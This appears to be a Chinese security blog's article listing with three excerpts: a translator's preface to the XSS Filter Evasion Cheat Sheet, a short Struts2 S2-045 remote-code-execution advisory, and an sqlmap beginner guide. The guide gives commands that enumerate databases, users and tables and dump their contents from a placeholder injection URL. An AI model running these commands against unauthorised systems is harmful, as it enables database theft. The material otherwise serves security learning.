秋边丶 发布的文章

XSS Filter Evasion Cheat Sheet (中文版)[翻译]完整版


[TOC]

XSS Filter Evasion Cheat Sheet 中文版

==================================

译者注:
翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常的价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而非代码本身。



XSS-injection


Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.


Struts2漏洞预警(S2-045)


漏洞简介

  Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互;
  Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、devmode),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。



SQLmap-入门使用


1. 基础用法:

./sqlmap.py -u “注入地址” -v 1 –dbs               // 列举数据库
./sqlmap.py -u “注入地址” -v 1 –current-db       // 当前数据库
./sqlmap.py -u “注入地址” -v 1 –users            // 列数据库用户
./sqlmap.py -u “注入地址” -v 1 –current-user      // 当前用户
./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库”     // 列举数据库的表名
./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库”   // 获取表的列名
./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列
已经开始拖库了,它会将获取的数据存储sqlmap/output/中、、、